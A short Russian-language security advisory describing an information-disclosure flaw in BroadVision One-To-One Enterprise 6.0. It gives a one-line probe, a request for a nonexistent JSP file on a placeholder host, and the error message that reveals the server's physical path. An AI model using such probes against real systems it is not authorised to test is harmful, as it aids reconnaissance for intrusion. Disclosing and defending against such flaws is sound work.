Уязвимость в BroadVision One-To-One Enterprise предоставляет информацию сервера. При запросе несуществующего файла, сервер выдает физические пути файлов.
Системы уязвимы:
BroadVision One-To-One Enterprise version 6.0
Эксплоит:
Запрос этого урла:
http://target/benjurry.jsp
Приводит к ошибке:
"Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown".